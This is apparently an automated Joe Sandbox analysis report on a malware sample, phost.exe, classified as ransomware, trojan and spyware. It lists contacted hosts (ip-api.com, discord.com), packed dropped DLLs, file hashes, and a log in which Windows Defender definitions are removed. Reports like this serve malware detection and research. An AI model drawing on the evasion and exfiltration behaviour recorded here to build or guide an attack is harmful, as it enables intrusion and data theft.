                                                                                                                                                                                                          https://github.com/urllib3/urllib3/issues/2920phost.exe, 00000001.00000003.1842261128.000001AE1D6F6000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D6F6000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2171558185.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1830725428.000001AE1D6F0000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178106775.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1856459466.000001AE1D6F0000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2174353903.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2179183258.000001AE1DBB8000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1851038862.000001AE1D6F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17phost.exe, 00000001.00000003.2171558185.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2167660271.000001AE1E6C3000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178106775.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2174353903.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2166653178.000001AE1D872000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              http://www.microsoftMESSAG~1.JSOy./phost.exe, 00000001.00000003.1849010645.000001AE1D730000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#phost.exe, 00000000.00000003.1679692860.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_dataphost.exe, 00000001.00000002.2176893974.000001AE1CFA0000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684583206.000001AE1CFAA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684912540.000001AE1CFA2000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684728779.000001AE1CFA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    https://yahoo.com/phost.exe, 00000001.00000003.1837339893.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1853895159.000001AE1D368000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1815420180.000001AE1D359000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1864387686.000001AE1D361000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1848923148.000001AE1D368000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2175758589.000001AE1D383000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2171558185.000001AE1D600000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1864030272.000001AE1D35D000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2177552719.000001AE1D385000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1871682113.000001AE1D361000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1857854012.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2174353903.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D604000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178106775.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1830725428.000001AE1D600000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      https://account.bellmedia.cphost.exe, 00000001.00000003.1866119745.000001AE1E6F6000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2179807278.000001AE1E6EA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2180428095.000001AE1E964000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6phost.exe, 00000001.00000002.2177248707.000001AE1D1A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          https://g.live.com/odclientsettings/ProdV2svchost.exe, 00000014.00000003.1751303220.000001E22D972000.00000004.00000800.00020000.00000000.sdmpfalse
Legend (share of contacted IPs per country):
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

| IP              | Domain      | Country       | ASN   | ASN Name      | Malicious |
|-----------------|-------------|---------------|-------|---------------|-----------|
| 208.95.112.1    | ip-api.com  | United States | 53334 | TUT-ASUS      | true      |
| 162.159.137.232 | discord.com | United States | 13335 | CLOUDFLARENETUS | true    |

IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1574326
Start date and time: 2024-12-13 08:40:50 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 13m 10s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 125
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: phost.exe
Detection: MAL
Classification: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@199/60@4/3
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 86%
• Number of executed functions: 120
• Number of non-executed functions: 181
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 172.217.19.227, 23.218.208.109, 20.12.23.50, 13.107.246.63, 52.149.20.212
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, gstatic.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target mshta.exe, PID 3848 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 2912 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7400 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: phost.exe
Time     | Type            | Description
02:41:45 | API Interceptor | 8x Sleep call for process: WMIC.exe modified
02:41:46 | API Interceptor | 127x Sleep call for process: powershell.exe modified
02:41:48 | API Interceptor | 2x Sleep call for process: svchost.exe modified

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 1.3073759923211927
Encrypted: false
SSDEEP: 3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrH:KooCEYhgYEL0In
MD5: 61D71392A301B081EFE4418B4E340E39
SHA-1: 376F1AF4DD3AE97A94EEA6E41E5CA4270643D9EC
SHA-256: 744B8870071E506EDEE7AD52F48B47A4BC7A0A8EC426F190C651FDDB00D41CD0
SHA-512: 0D15622BE7D8DCB736BA0D182277E47C7AE9F0E5F294C05B313B80232C23613C02471A3E45895480DE008482A0E6E46F2F92FD9BE9F181932C5F48BEF8BB4058
Malicious: false
Reputation: unknown
                                                                                                                                                                                                                            Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0xa482f3c7, page size 16384, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.4221475214700262
Encrypted: false
SSDEEP: 1536:BSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Baza/vMUM2Uvz7DO
MD5: C413DFE1813856686583B3554ED45E76
SHA-1: 49ABE0C3E213C0B91634E0D24B09DEEC26EC01C8
SHA-256: 589E331447AE1B032C955FC5700A7FADE56EABE4CFBBD220D567F20FE90F05AD
SHA-512: BB9A7D14FF659A0F7A89C5C7D2802FF9498E3BB5E769A4F883AB175EDAEB0822E57BC8CE1F653E2D41C1DFE76500EC97C679E34F912580E2C2B2E2BC691B383B
Malicious: false
Reputation: unknown
                                                                                                                                                                                                                            Preview:....... .......A.......X\...;...{......................0.!..........{A.1)...|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................3U.)1)...|...................8G.1)...|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 16384
Entropy (8bit): 0.07706861796382056
Encrypted: false
SSDEEP: 3:JZS6Yejwuauajn13a/w4VY//AllcVO/lnlZMxZNQl:Xdzjfa53qwV/AOewk
MD5: C4C7AFF2D6AAD5478F260F8E0B4F955F
SHA-1: D2AA7BFA0791B36ECE4FEBDF2F9A2C77012C3073
SHA-256: F12358942163F352E0C07F22ADB868FB2FF1121AC06DB6F3D97896834343A410
SHA-512: 6372CF06EB66ECB1E4E439373B2904D63211F5D302D60474E7CFDE1D444A61F28F6F471EA78ADD4568771F1DEBA0DD2EC2A9E1EC5A62B3467617F51366777750
Malicious: false
Reputation: unknown
                                                                                                                                                                                                                            Preview:.{.......................................;...{..1)...|.......{A..............{A......{A..........{A].................8G.1)...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA-1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Reputation: unknown
                                                                                                                                                                                                                            Preview:@...e...........................................................

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 706250
Entropy (8bit): 7.928179193196619
Encrypted: false
SSDEEP: 12288:9CJt7G19YHjWTnRyMqTVGInIQghHK5gYrNvOLOkT+TvDhdkBeKc89B:9C49RTnMlR/IQqYgYrNvO6eq9daeKc8/
MD5: EADFB28E5835FF3D32EB5824EC32A474
SHA-1: 1FF3F10F785B72AFA1993BD24338DD81CB79D83B
SHA-256: D0E034501D05159C8B53F22FCBB21DA6947A0B75153C8197840389DEE3163355
SHA-512: D9A777B1E6A55FA7323E9B655AB4501EB59BC38D0BEA5EB4D508FAA58578CA09F5D068C34FBC29BC102F9D33FA12AF24072B1D938D0D99592E656A53DC853109
Malicious: false
Reputation: unknown
                                                                                                                                                                                                                            Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...^.v..{NW...)..3.].=..9m.v.m.EH..lc...x7.}........`..$.b....-..I...........R.89.w"./..|.......Z.7BoY..M.s3c+......m..?2...0....9.s....~....#}..x_.d$....5@....v...}.z......v.k..T..)...'..N..X..}'.e-....mA..C.~....WP?vI..^S;fqG..=t.G-...&.#_..}?[8...rO..........aS.....?~1...A....%}?.q}........{......g.D...%.......<.....<U..>......7...|........x_.....-...O.W.H..T..... 6.O&......P?.....~C......T....A.yK}..v.Ca....c.?2....N.}....}..(.L..'..G}..C.....q\?..c\k..|.~.c...../.J.k...<..o.yUl.......{.{.....}1.......)6n....}b..1..{...y..v_..17.v........-.4....{^..s..v,..G;....zo.c.....6;.6...G.C...>7..#.[...8...D}.{.....{.}c....=..-....=...%...$.v.;.w...1..#^+....Lycw....[.n..%.......?..].I....9.c.s.......v....|D....H..pg....lB..w'.<b}..}...O.3.mwG..!.o.X}......c....>h/...>........x.v1o..C..x..'.<A.y`n...3.1.O......m)....).\].k1..i..q,..kN.

Process: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe
File Type: RAR archive data, v5
Category: dropped
Size (bytes): 757646
Entropy (8bit): 7.999736789323823
Encrypted: true
SSDEEP: 12288:uElNmrIp2smq2mOd7ys9D2qUDqlU54hFjCDuksUTVv+MjNkMdO/rcmBiH0OFS:uw0Y2sv2my7ygD2qUDr5SFjChddYjcJ0
MD5: 1E909F7CC298F3086E9AA5BE0D09768F
SHA-1: 931A5056D9D36FA581F04EC5FE2FD654D7BEAD44
SHA-256: 042655B7F2743818ADFAC34EFD97D5E6045FB218BAED192F587B3A449D315223
SHA-512: 834272434703C41924747341D1DE5EEEA6EE9B23438F34C0EB3E9F43E55FE63D8B1308DE83B197E49969AB7A41A35D08B57C6152B2717A6BC95AA1FAFFA66657
Malicious: true
Reputation: unknown
                                                                                                                                                                                                                            Preview:Rar!......g!.....gw..V.Q&.y!ux.6.....h0...n.V`......U.JrE....D$.<Km.\jn..6y.K.....r"k.K.....y@....D..e..DPz._.....W.}z...fy.i.g.I3...C.v.h.^..!..x..Qrg...d..."..}./.v....^..h(.&.......w..R..nu{.^...U!..NA.....T6.PN.3/mE..+.C....h...S8..'..E..B..^mx.Ci!............41...3h..%PN...o.N.i...];....nu..~S..ZHl.0.Ov.T\..........r..l....._.2.DMG}...2.o]....J`$....P.-~..o..=8.4.v..P....I....s...TC=7...M....P#N^.....\D*Pj._..[.y..<..._Cx.W.....=6.n.,.[..q........-...G...,.........B....m.D.mC...T.5.r.......)..-.SI.F.e..{.u=.MsJ...fZ.=...k...g.L&.!..<..wl..=fR9.....DG........j.v..?.p........"......h...'.z.f2..X..^l.....`~......x,...%7......uM..|.{:.....a{..>..X.#^245Q4z.SJ....w...X....IV.X#..0..h.B.y.[.d...<.Wlu.....y4..e8.R]..zX.C.j.v......:.....O..\I...:6).....^E.."R..d.@.\....A#.,.....=.:.@.............upVX.xX...[..K..t.5?.R......w.ah|....{..C/.1.C..U:...E.L.{.|/#O!..."fd...A..9W9s..z.....m@Q..*?..RF+H.Kd.o}.M.H.d..c]/~...~Qb......7.,.xG.....].P.....!....T

Process: C:\Program Files\Windows Defender\MpCmdRun.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: modified
Size (bytes): 894
Entropy (8bit): 3.1142270972323556
Encrypted: false
SSDEEP: 12:Q58KRBubdpkoPAGdjrN78sk9+MlWlLehW51IC0781:QOaqdmOFdjrmv+kWResLIe1
MD5: 4EF56D046A1B4B24A11061DC33DACB35
SHA-1: 240AAE0289B81B02CFD1F1603DC51BB22618C087
SHA-256: 69F26C82BFAEFDE7210F5D436C7D982C1C48B1F1A8F737A1A63477E18D56DA79
SHA-512: 629894D9DAF141AA81C0122EEA4924B87F198565711FB4A5AF577E460959F30A84995F8BE9D9F2580C4F18A5ADB812D92C37D11F343ED1716F3AE4AACC6C9AAF
Malicious: false
Reputation: unknown
                                                                                                                                                                                                                            Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. D.e.c. .. 1.3. .. 2.0.2.4. .0.2.:.4.1.:.5.8.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. F.r.i. .. D.e.c. .. 1.3. .. 2.0.2.4. .0.2.:.4.1.:.5.8.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....
Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Fri Dec 13 08:56:10 2024, 1st section name ".debug$S"
Category:dropped
Size (bytes):1372
Entropy (8bit):4.122600787215519
Encrypted:false
SSDEEP:24:HoFq9UZf1orDfHKwK9Gof3NWI+ycuZhNpYakSGNPNnqS+d:IvB1YBKD341ulia32qSe
MD5:7EC0018A1BF0364548FE7A8CA45DA3C2
SHA1:D11CD7EDEFC0E8B1474A68827407651AE1D738CA
SHA-256:F59B2ED50C0C5BA912B8A38F6D59B691261496D0F4ACA04F468CD0D9E53BDCCC
SHA-512:E947F826946D7A6E8D1F8AD9AC9704E6015F127CB1F34C45A17E3635905FB24E591D79F805749A0B3DD094AA85F9FC7512DF5833574C9D34B6DC5DBE64504809
Malicious:false
Reputation:unknown
Preview:L.....[g.............debug$S........x...................@..B.rsrc$01........X.......\...........@..@.rsrc$02........P...f...............@..@........S....c:\Users\user\AppData\Local\Temp\jnxiphgt\CSC11F91C33F0BB4EC3B771882E34D952E.TMP................9.i....'.=._[}...........4.......C:\Users\user\AppData\Local\Temp\RESBE0B.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.n.x.i.p.h.g.t...d.l.l.....(.....L.e.g.a.
Process:C:\Users\user\Desktop\phost.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):109392
Entropy (8bit):6.641929675972235
Encrypted:false
SSDEEP:1536:GcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/woecbq8qZHg2zuCS+zuecL:GV3iC0h9q4v6XjKwoecbq8qBTq+1cL
MD5:4585A96CC4EEF6AAFD5E27EA09147DC6
SHA1:489CFFF1B19ABBEC98FDA26AC8958005E88DD0CB
SHA-256:A8F950B4357EC12CFCCDDC9094CCA56A3D5244B95E09EA6E9A746489F2D58736
SHA-512:D78260C66331FE3029D2CC1B41A5D002EC651F2E3BBF55076D65839B5E3C6297955AFD4D9AB8951FBDC9F929DBC65EB18B14B59BCE1F2994318564EB4920F286
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........u...u...u.E.t...u.....u...t...u..v...u..q...u..p...u..u...u......u..w...u.Rich..u.........PE..d..._#;..........." ...".....`......................................................=.....`A........................................`C..4....K...............p.......\..PO...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata.......p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................
Process:C:\Users\user\Desktop\phost.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):49944
Entropy (8bit):7.78315600372484
Encrypted:false
SSDEEP:1536:U/onT0xi3xXtfwYf5CVW3Bd7IGCVwU7SyixL7:U/k538e5CIRlIGCVwUO7
MD5:85C70974FAC8E621ED6E3E9A993FBD6F
SHA1:F83974E64AA57D7D027B815E95EBD7C8E45530F1
SHA-256:610983BBCB8EE27963C17EAD15E69AD76EC78FAC64DEB7345CA90D004034CDD6
SHA-512:142792750E4A5189DBEAA710E3F5B3689D593927EA77DED00EB5CAADA6B88D82A37459770845F1EA7C9F45DA5A6AE70E19BFCF76D9F1A56184C3164B736BCB18
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 4%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w.l.3...3...3...:...9......1......0......>......;......7.......0...x...1...3...l.......;.......2.......2.......2...Rich3...................PE..d...f..e.........." ...#.............e....................................................`.............................................H.................... ..,...................................................q..@...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
Process:C:\Users\user\Desktop\phost.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):60696
Entropy (8bit):7.822236524949101
Encrypted:false
SSDEEP:1536:WbK/YBHE2gCtX+/9zyeoVIkwLMzKep8z+IGLPAt7SyWxU:WGAK2ghtGIk6MeeGyIGLPAtz
MD5:E7EF30080C1785BAF2F9BB8CF5AFE1B2
SHA1:B7D7D0E3B15DE9B1E177B57FD476CECBDD4FCB79
SHA-256:2891382070373D5070CB8FD6676AFC9F5EB4236251F8FC5C0941AF0C53A2D31E
SHA-512:C2EC431D2821879BB505D8ECA13FA3921DB016E00B8674FA62B03F27DC5CEE6DD0DE16BA567D19D4B0AF9A5CB34D544383A68CC63FF2FA9D8BB55E356D0D73E6
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 4%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......>...z.z.z.s...|....x....v....r....~.....x.1...{.1...|.....y.z.......|.....{...o.{.....{.Richz.................PE..d...c..e.........." ...#.............-.......................................P............`.........................................HL.......I.......@.......................L.......................................9..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
Process:C:\Users\user\Desktop\phost.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):108312
Entropy (8bit):7.9301662560961494
Encrypted:false
SSDEEP:3072:HnHQe/FKYjTnmuJkv4D5ZIBGeKHC6ajQ6BWIGOqmbtbb9:HnHQe/MYjTnDJRX6Ge16ehbhx
MD5:3923E27B9378DA500039E996222FFEE6
SHA1:A9280559A71ABF390348E1B6A0FB1F2409649189
SHA-256:0275B03041F966E587D1C4C50266C3FDFF1E1A65F652AD07B59CB85845B5457E
SHA-512:051C613403FD80B9582DD48C1F38870CB26846D54B75603EA52A78202A72272107E95750DE78CD8F6C56951EBDE501B4892D90FB306326B86124C8CC97BCA594
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 4%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@.R.!...!...!...Y=..!..+]...!..+]...!..+]...!..+]...!..M\...!...Y...!...!...!..M\...!..M\...!..M\...!..M\Q..!..M\...!..Rich.!..........PE..d...T..e.........." ...#.p...................................................0............`..........................................,..P....)....... ...........'...........-..........................................@...........................................UPX0....................................UPX1.....p.......f..................@....rsrc........ .......j..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
Process:C:\Users\user\Desktop\phost.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):36120
Entropy (8bit):7.670480771561197
Encrypted:false
SSDEEP:768:6EKW7574DsajR20fnfPHz8HLP8pfbnIGOINg5YiSyvIAMxkE3n1:jKW7hq00fnTQEbnIGOINy7Sy+xzn1
MD5:C8B153F0BE8569CE2C2DE3D55952D9C7
SHA1:0861D6DCD9B28ABB8B69048CAF3C073E94F87FDC
SHA-256:AF9F39D2A5D762214F6DE2C8FEC0A5BC6BE0B8223EF47164CAA4C6E3D6437A58
SHA-512:81CCBFFF0F4CDD1502AF9D73928B940098B9ACC58B19C1A939ECDF17418096294AF4A4529EE7A0BBE1C686E3B0254651E211C1093264D1835065A82711AC0379
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 4%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........u...&...&...&.U&...&u..'...&u..'...&u..'...&u..'...&...'...&...'...&...&M..&...'...&...'...&..9&...&...'...&Rich...&........PE..d......e.........." ...#.P.........../.......................................P............`.........................................|K..P....I.......@.......................K.......................................;..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........@.......R..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

Process: C:\Users\user\Desktop\phost.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 87832
Entropy (8bit): 7.917277859124498
Encrypted: false
SSDEEP: 1536:cjQY6vZR307kwHMn3NsbM5PlvQzSqoSdPN1uruZkU2D90nGt4pcgIGZ1rA7SyTx7:EQY6nEZe3NsbI1QzSwlaugudNIGZ1rAP
MD5: BC2EBD2A95619AB14A16944B0AB8BDE5
SHA1: C31BA45B911A2664FC622BB253374AB7512FC35A
SHA-256: AEB3FD8B855B35204B5088C7A1591CC1CA78FFFE707D70E41D99564B6CB617C6
SHA-512: 86A6685EFEC72860991C0F0FA50F46A208211D3F8FC44012B12437D141C5F1A24C34A366F164D225869680707B482AB27A2720C698EBE8026F1C5807E81F8437
Malicious: false
Antivirus: ReversingLabs, Detection: 0%
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........TB#.5,p.5,p.5,p.M.p.5,p.I-q.5,p.I)q.5,p.I(q.5,p.I/q.5,pnH-q.5,p.M-q.5,p.5-p.5,pnH!q.5,pnH,q.5,pnH.p.5,pnH.q.5,pRich.5,p........PE..d......e.........." ...#. ...............................................................`.........................................4...L....................P.........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

Process: C:\Users\user\Desktop\phost.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 26904
Entropy (8bit): 7.418027428269828
Encrypted: false
SSDEEP: 768:Xzh/iDHAPcpqyIGQUNz5YiSyvHAMxkEJ5YSv:jhiDHAP5yIGQUN97SyPx/Y+
MD5: FCBB24550F59068A37EA09A490923C8A
SHA1: 1E51D9C156354E00909C9F016DDB392A832F8078
SHA-256: DE2AC6D99234A28DCF583D90DCA7256DE986FCA9E896C9AAFD1F18BB536978B8
SHA-512: 62474BF9D5F39591240F71FD9270FCC7A2B2C0B4A1F93CBB57021040AD85B3AB8C401D17AEDF0141105118772F453C6137A026736F069CC7A965CB30E5479F07
Malicious: false
Antivirus: ReversingLabs, Detection: 4%
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B:W\.[9..[9..[9..#...[9..'8..[9..'<..[9..'=..[9..':..[9..&8..[9.M#8..[9..[8.M[9..&4..[9..&9..[9..&...[9..&;..[9.Rich.[9.........................PE..d...Y..e.........." ...#.0...............................................................`.............................................L.......P............`..............<..........................................@...........................................UPX0....................................UPX1.....0.......*..................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

Process: C:\Users\user\Desktop\phost.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 45336
Entropy (8bit): 7.7177626825594965
Encrypted: false
